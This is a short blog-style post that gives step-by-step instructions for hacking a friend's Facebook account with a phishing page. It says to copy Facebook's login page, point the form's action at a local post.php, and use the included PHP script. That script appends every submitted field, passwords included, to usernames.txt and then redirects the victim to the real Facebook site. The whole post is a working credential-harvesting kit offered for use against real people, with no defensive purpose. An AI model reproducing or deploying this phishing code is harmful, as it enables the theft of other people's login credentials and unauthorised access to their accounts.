There are few steps to hack your friend Facebook account
Step 1
Create a fake facebook login page.
Step 2
Copy the page source in notepad. And find for action if you get or find for login_form which is preceded by action.
Step 3
Then change
action="https://m.facebook.com/r.php"
to action="post.php"
Step 4
Save this notepad file as index.html (take care of extension)
Step 5
Open new notepad file and paste the below code and save this file as post.php (take care of extension)
<?phpheader ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
0 comments:
Post a Comment